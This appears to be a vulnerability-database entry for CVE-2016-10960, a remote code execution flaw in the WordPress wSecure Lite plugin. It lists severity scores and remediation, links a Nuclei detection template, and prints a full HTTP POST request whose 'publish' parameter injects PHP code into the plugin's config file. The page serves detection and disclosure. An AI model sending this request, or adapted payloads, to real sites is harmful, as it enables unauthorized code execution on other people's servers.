🔙 목록으로 돌아가기

CVE-2016-10960: WordPress wSecure Lite < 2.4 - Remote Code Execution

TitleWordPress wSecure Lite < 2.4 - Remote Code Execution
Authordaffainfo
SeverityHigh
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected WordPress site.
RemediationUpdate to the latest version of WordPress wSecure Lite plugin (2.4 or higher) to fix the vulnerability.
CVSS Score8.8
EPSS Score0.57085
CVE IDCVE-2016-10960
CWE IDCWE-20
Tags cve2016 cve wordpress wp-plugin rce joomlaserviceprovider vkev vuln

🔍 Vulnerability Description

WordPress wsecure plugin before 2.4 is susceptible to remote code execution via shell metacharacters in the wsecure-config.php publish parameter.

🌐 HTTP Request

POST /wp-content/plugins/wsecure/wsecure-config.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Mobile/15E148 Safari/604.1
Connection: close
Content-Length: 100
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

wsecure_action=update&publish=";} header("kexch: CVE-2016-10960"); class WSecureConfig2 {var $test="

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2016/CVE-2016-10960.yaml

🦈 Packet Capture: ⬇️ Download cve-2016-10960.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A